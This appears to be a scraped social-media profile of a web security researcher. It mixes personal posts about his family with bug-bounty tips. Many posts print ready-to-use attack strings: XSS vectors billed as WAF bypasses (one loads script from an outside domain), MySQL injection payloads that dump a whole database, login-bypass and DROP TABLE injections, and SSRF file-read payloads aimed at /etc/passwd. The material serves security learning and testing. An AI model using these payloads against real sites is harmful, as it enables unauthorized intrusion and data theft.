Rodolfo Assis Profile Banner
Rodolfo Assis Profile
Rodolfo Assis

@RodoAssis

Followers
9,759
Following
113
Media
502
Statuses
2,911
Explore trending content on Musk Viewer
Pinned Tweet
@RodoAssis
Rodolfo Assis
3 years
I don't think that watching/reading #hacking tutorials and collecting BB tips in Twitter or any other social media will make you UNDERSTAND what you are doing and why that happens. Build a solid foundation with PROGRAMMING, NETWORKING, PROTOCOLS and OPERATING SYSTEMS first.
18
67
412
@RodoAssis
Rodolfo Assis
5 years
Tweet media one
12
276
955
@RodoAssis
Rodolfo Assis
5 years
Cloudflare #WAF Bypass Just use {alert`1`} instead of alert(1). Any #XSS vector will work (except <script>). Yeah, it's just that easy.
7
190
568
@RodoAssis
Rodolfo Assis
3 years
#XSS #WAF #bypass 🤩 (Just worked in a bug report!)
Tweet media one
5
93
483
@RodoAssis
Rodolfo Assis
4 years
The very first skill you need to be a good hacker is to be able to find things by yourself. Be good at searching for info & analyzing it so you can get the best resources on any subject. Your mind is like an axe to chop a tree: the sharper it is, the faster it gets job done.
8
110
462
@RodoAssis
Rodolfo Assis
2 months
Tweet media one
4
58
453
@RodoAssis
Rodolfo Assis
4 years
A story I'm really proud of. After I had learned #XSS and retired as #1 from @openbugbounty in 2015, @kenanistaken came to me asking if I could teach him. I said there would be a PRICE. My price was "you have to do for someone else what I'm about to do for you". He agreed. 🙂
18
35
394
@RodoAssis
Rodolfo Assis
5 years
My son César just born last night! With just 28 weeks and 1.3 kg he's still struggling to survive. #BabyBrute
Tweet media one
100
3
392
@RodoAssis
Rodolfo Assis
6 years
Now you will know where it comes from if you see '-0||' in any #SQLi list out there. If you see... 😉
Tweet media one
5
126
281
@RodoAssis
Rodolfo Assis
4 months
#XSS 😉
Tweet media one
4
33
270
@RodoAssis
Rodolfo Assis
3 years
Import from #XSS vector itself! <Img Src=//X55.is OnLoad=import(src)> X55 domain allows custom JS code after #
6
100
271
@RodoAssis
Rodolfo Assis
2 years
Those might be useful some day so I will leave them here. #XSS #validation #bypass <a href="<svg/onload=" title=1>alert(1)" <a href="</script><svg/onload=" title=1>alert(1)"
8
83
268
@RodoAssis
Rodolfo Assis
5 years
7th anniversary of @brutelogic ! Today 7 years ago I've decided to go to Twitter to share what I have been learning about #hacking and #infosec . My life has changed dramatically since then and I was able to make a positive impact to many in this community. Thank you all! 😀
Tweet media one
20
21
260
@RodoAssis
Rodolfo Assis
4 years
Javascript://%E2%80%A9alert(1) Just an alternative to %250A or %250D against some security/validation filter in this classical DOM-based #XSS . #XSScheatSheet #unlockBrute
4
87
249
@RodoAssis
Rodolfo Assis
2 years
Tweet media one
1
45
243
@RodoAssis
Rodolfo Assis
4 years
My new son NICHOLAS was just born! 🥳🎉 #babyBrute2
Tweet media one
49
0
234
@RodoAssis
Rodolfo Assis
2 years
It seems the new PHP 8 treat MySQL error msgs as "fatal errors" not shown anymore in regular MySQL injection triggering. How to test for it: Number Input ?id=0.or-1%23 String Input ?s='or-1%23 If it returns the 1st regular result of the page or more than 1 result, bingo! #SQLi
Tweet media one
Tweet media two
11
78
230
@RodoAssis
Rodolfo Assis
2 years
How this can be so easy? 😆 #WAF #bypass #LFI
Tweet media one
Tweet media two
5
34
227
@RodoAssis
Rodolfo Assis
3 years
I prefer to be a good person than to be a good hacker. 1000 times.
8
18
221
@RodoAssis
Rodolfo Assis
6 years
Tweet media one
3
67
210
@RodoAssis
Rodolfo Assis
4 years
Bootstrap #XSS v4.0.0, 4.1.0 & 4.1.1 <Brute Data-Spy=scroll Data-Target='<Svg OnLoad=(confirm)(1)>'> No user interaction. #unlockBrute
1
71
208
@RodoAssis
Rodolfo Assis
4 years
Today is my #birthday ! 🥳🎉
Tweet media one
69
3
208
@RodoAssis
Rodolfo Assis
2 months
Do you want to easily #hack something but has not idea what to do? Start by using the following magic string in username and password fields! /1#\ Check the full reference below. #hack2learn #CyberSecurity #WebHacking #SQLi
Tweet media one
1
33
209
@RodoAssis
Rodolfo Assis
4 years
😀👏🏾🎉
Tweet media one
24
3
200
@RodoAssis
Rodolfo Assis
7 months
Tweet media one
6
13
198
@RodoAssis
Rodolfo Assis
5 years
My son is finally at home. #babyBrute
Tweet media one
25
0
192
@RodoAssis
Rodolfo Assis
6 years
#MySQL #SQLi Full database dump in one shot. make_set(6,@:=0x0a,(select(1)from(information_schema.columns)where@:=make_set(511,@,0x3c6c693e,table_name,column_name)),@) Usage Example: -1 union select 1, HERE, 1--+
Tweet media one
4
89
177
@RodoAssis
Rodolfo Assis
6 years
Tweet media one
6
37
177
@RodoAssis
Rodolfo Assis
5 years
I've put a lot of work on this to make it the greatest so far. Different from what you can find out there for free, this one has clear directions on how to use vectors/techniques, up-to-date information and tricks that only Brute can bring to you! 😉
3
37
179
@RodoAssis
Rodolfo Assis
4 years
Here is where my #XSS journey began. #hack2learn
4
29
180
@RodoAssis
Rodolfo Assis
4 years
Tweet media one
5
35
177
@RodoAssis
Rodolfo Assis
6 years
César a.k.a. "Little Brute"! 🤗
47
3
168
@RodoAssis
Rodolfo Assis
6 years
Tweet media one
1
53
162
@RodoAssis
Rodolfo Assis
6 years
Tweet media one
1
43
164
@RodoAssis
Rodolfo Assis
6 years
#SQLi Without Quotes
0
73
168
@RodoAssis
Rodolfo Assis
5 months
"New" bypass. That happens all the time with my work and I rarely get mentioned. They can't even understand what happens to change the payload disguising the copy a little bit better. 🤨
Tweet media one
5
26
170
@RodoAssis
Rodolfo Assis
5 years
Tweet media one
2
21
153
@RodoAssis
Rodolfo Assis
4 years
That's why I can't do things now at the pace I was doing before. #babyBrutes
Tweet media one
15
1
158
@RodoAssis
Rodolfo Assis
5 years
This #XSS vector was used by some lucky guys to bypass CloudFlare WAF not so long ago. Fixed now, sorry! 😉 <svg onx=() onload=(confirm)(1)> #TheArtofBypass booklet is on my plans for this year too.
2
29
151
@RodoAssis
Rodolfo Assis
2 years
🤣🤣🤣
Tweet media one
0
19
144
@RodoAssis
Rodolfo Assis
6 years
Tweet media one
2
37
141
@RodoAssis
Rodolfo Assis
3 years
To be a real good hacker you must be smart enough to do to a couple of things IMHO: 1. Be able to find the info you need by yourself; 2. Be able to correctly evaluate technical content: 3. Be able to find and fill the gaps in current hacking knowledge. #hack2learn
3
24
142
@RodoAssis
Rodolfo Assis
4 years
Tweet media one
5
10
144
@RodoAssis
Rodolfo Assis
3 years
An anchor with relative path, perfectly valid HTML usually allowed in whitelists to inject in proper JS contexts. #XSS #bypass <a/href="/alert(1)/"> Check PoC and context below. It works against Bitrix WAF, for example. 😉
1
37
142
@RodoAssis
Rodolfo Assis
3 years
=> Vulnerability LFR via SSRF => Scenario PHP file_get_contents() with filter_var() + FILTER_VALIDATE_URL + FILTER_FLAG_QUERY_REQUIRED => Payload file:///etc/?/../passwd
Tweet media one
Tweet media two
2
44
142
@RodoAssis
Rodolfo Assis
4 years
It was Father's Day here! 😊
Tweet media one
Tweet media two
7
0
142
@RodoAssis
Rodolfo Assis
10 months
New #KNOXSS release is absolutely INSANE. It can deliver to you an actually verified Proof-of-Concept (PoC) of a #XSS vulnerability in little more than 1s. One second. No manual testing can do it that fast. No other testing tool have that accuracy.
Tweet media one
0
30
135
@RodoAssis
Rodolfo Assis
5 years
Tweet media one
9
0
133
@RodoAssis
Rodolfo Assis
2 years
file:///etc/passwd A known FILE DISCLOSURE vector, right? But then the developer use a simple full URL validation requiring query string and boom, you get the bots and kiddies right out of the game! Check out why:
1
48
128
@RodoAssis
Rodolfo Assis
4 years
Future is here. #babyBrute 😍
Tweet media one
11
2
127
@RodoAssis
Rodolfo Assis
3 years
Follow me there for more! 😀
0
55
128
@RodoAssis
Rodolfo Assis
1 year
Tweet media one
2
14
121
@RodoAssis
Rodolfo Assis
5 years
Tweet media one
3
40
121
@RodoAssis
Rodolfo Assis
2 years
Tomorrow is a very special date to me: @brutelogic 's 10th anniversary Sadly, I couldn't prepare anything special to share and celebrate that milestone. But I hope to bring some ideas to life until the end of this year labeled as "Brute Logic 10th Year". Wish me luck! 🙂
21
6
123
@RodoAssis
Rodolfo Assis
3 years
#SQLi Poem =Injecting+SQL+every+night'; /*Let's*/DROP+TABLE+users; /*If+you+can't+code+it+right*/ SELECT+"a+new+job+loser!";# Just found that in my old stuff! 😆
1
20
117
@RodoAssis
Rodolfo Assis
6 years
When sharing knowledge: - Be patient and supportive - Be clear in your directions - Do not assume that people knows what you know.
6
25
118
@RodoAssis
Rodolfo Assis
5 years
It's an art! 😎
Tweet media one
0
7
118
@RodoAssis
Rodolfo Assis
4 years
Tweet media one
2
6
118
@RodoAssis
Rodolfo Assis
5 years
At least 2 major WAFs! 😎
Tweet media one
2
20
114
@RodoAssis
Rodolfo Assis
4 years
I just want to inform people who follow my work, here or in @brutelogic @knoxss_me etc that although I'm not that much active as I used to be, I'm still working (somehow) in the background. It's just because things got really hard here taking care of these kids! 😍
Tweet media one
8
1
112
@RodoAssis
Rodolfo Assis
4 years
It's just a new side project that was born, I didn't even added https to it. But I have ambitious ideas about it, both for @knoxss_me and another project. The idea is to make better PoCs for everyone! Check it out: <Img Src=//X55.is OnError=import(src)>
1
25
111
@RodoAssis
Rodolfo Assis
1 year
I'm suffering from severe mental health issues in the last years, it's being hard for me to get back online with new stuff. If anyone is willing to help me, please do it by spreading the word about my blog and booklet and specially my underrated online tool @KN0X55 Thank you.
30
31
112
@RodoAssis
Rodolfo Assis
3 years
#XSS Test Methodology 101 Test every entry point with "XSS" in this command line for reflection, one at a time. URL fragment one will work only in browser. $ curl --data "p1=XSS&p2=XSS&pn=XSS" " https://domain/XSS/XSS/XSS?p1=XSS&p2=XSS&pn=XSS#XSS"
2
35
107
@RodoAssis
Rodolfo Assis
2 years
I didn't know that so I'm sharing this no matter easy and straightforward it might be... 😀 You can use a WILDCARD (*) to check all URLs of domain or folder of an app in Wayback Machine! Like (encoding of %2A here is just because Twitter link requires)
Tweet media one
7
23
107
@RodoAssis
Rodolfo Assis
3 years
Get ready for the next one. #XSS
Tweet media one
2
13
104
@RodoAssis
Rodolfo Assis
2 years
Heading to 50k, such a milestone for me!😀
Tweet media one
3
5
100
@RodoAssis
Rodolfo Assis
1 year
It's because you understand the example not the technique.
Tweet media one
1
7
99
@RodoAssis
Rodolfo Assis
3 years
Not sure if this is well known (single slash after scheme & double encoding in path) but for PHP curl-based #SSRF to achieve Local File Read (LFR) this is possible: File:%2Fetc%252Fpasswd
Tweet media one
0
28
100
@RodoAssis
Rodolfo Assis
4 years
Tweet media one
2
13
99
@RodoAssis
Rodolfo Assis
5 years
Stay tuned. 😉
Tweet media one
0
7
96
@RodoAssis
Rodolfo Assis
4 years
I think guys in my position wonder how one can be able to help people one by one with my current level of attention. I can only say there's a kind of *JOY* when you see people learning from you or show gratitude for the work you do. Thank you all for all the love I get! 😊🙏🏾
5
1
97
@RodoAssis
Rodolfo Assis
3 years
No need to even change the order.
Tweet media one
Tweet media two
4
20
97
@RodoAssis
Rodolfo Assis
6 years
I mind my own business. It means I'm more interested on being a BETTER ME than in mocking people down. It means I'm more concerned about doing a BETTER JOB than in trying to make someone else's job look bad. It means I'm sensible enough to #RESPECT other people and their work.
1
8
96
@RodoAssis
Rodolfo Assis
4 years
🤷🏾‍♂️
Tweet media one
6
16
97
@RodoAssis
Rodolfo Assis
5 years
My son and my hope in a better future. Thank you all for your priceless support when he was at hospital. He's very healthy and extremely lovely right now! ☺️
Tweet media one
6
0
94
@RodoAssis
Rodolfo Assis
5 years
I didn't want to rescue any more animal because we are living a very sacrificing life and we can barely handle our situation here. But after WEEKS passing and seeing him dying slowly, I was expecting to not see him anymore. 😔 Today I couldn't resist. I have to try to save him.
Tweet media one
9
4
92
@RodoAssis
Rodolfo Assis
3 years
If You Want To Be Successful STAY AWAY! From the crowds: If everyone is going one way, run to the opposite direction. From other's agenda: Everyone do their stuff for a purpose and it's to help them, not you. From dependency: Learn by yourself as much as you can.
4
20
91
@RodoAssis
Rodolfo Assis
5 months
What you've been told about #XSS and what we actually do.
Tweet media one
4
13
91
@RodoAssis
Rodolfo Assis
5 years
I wish people could understand how difficult is for me to do all I do (online)! - 4 Twitter + 1 Facebook accounts - 1 online tool + customer service 24/7 - 1 blog + 1 cheat sheet - Research + content creation - Chats + #XSS consulting every day 😎
7
0
88
@RodoAssis
Rodolfo Assis
2 years
By now this bypasses a lot of WAFs out there if you ever come across that scenario. #XSS #bypass #WAF
@BRuteLogic
Brute Logic
2 years
PyScript #XSS Vector <py-script> print('\74img/src/onerror\75alert(1)\76') </py-script> PoC:
9
98
285
0
16
92
@RodoAssis
Rodolfo Assis
5 years
Tweet media one
1
27
85
@RodoAssis
Rodolfo Assis
5 years
Me & #babyBrute enjoying some time out. He's about to complete 10 months next Thursday (time flies!).
Tweet media one
6
0
86
@RodoAssis
Rodolfo Assis
4 years
Please @TwitterSupport give my main @brutelogic account back... 😟
19
19
83
@RodoAssis
Rodolfo Assis
5 years
Tweet media one
2
18
86
@RodoAssis
Rodolfo Assis
1 year
#MySQL #SQLi #PoC Shortest DB DIOS - Dump In One Shot #BugBounty #Pentest Make_Set(7,@:=0,(Select-1.From(Information_Schema.Columns)Where@:=Make_Set(63,@,0xa,Table_Schema,Table_Name,Column_Name)),@) Usage Example: ?id=0 Union Select 1, DIOS, 1--+
Tweet media one
0
22
86
@RodoAssis
Rodolfo Assis
6 years
1338? Come on... 😆
Tweet media one
7
1
83
@RodoAssis
Rodolfo Assis
3 years
Father's Day here! 😍
Tweet media one
Tweet media two
3
0
86
@RodoAssis
Rodolfo Assis
6 years
Shortest #SQLi (Login Bypass) user: '- pass: ' Try here
3
31
82
@RodoAssis
Rodolfo Assis
2 years
After 00:01 UTC November 25th the current version of my #XSS ebook will have an awesome $9.95 USD special price! 🤩 #BlackFriday #CyberMonday Don't miss that offer!
Tweet media one
5
22
82
@RodoAssis
Rodolfo Assis
5 years
#BabyBrute 1st bath, in a bucket! 🤗
Tweet media one
11
0
81
@RodoAssis
Rodolfo Assis
2 years
')})/alert(1)(()=>{k:// That's just one of the EXCLUSIVE payloads you find only here in my Cheat Sheet! 😉👇🏾 Just $9.95 USD! #BlackFriday #CyberMonday
2
19
81
@RodoAssis
Rodolfo Assis
5 years
Tweet media one
5
0
79
@RodoAssis
Rodolfo Assis
5 years
Just got a #XSS bypass for a known open-source WAF... 😎
5
0
76
@RodoAssis
Rodolfo Assis
3 years
Tweet media one
1
8
79
@RodoAssis
Rodolfo Assis
7 months
Today is one of the most important days of my life! My sons just started their education journey. There's a long road ahead. I love my sons.
Tweet media one
12
0
79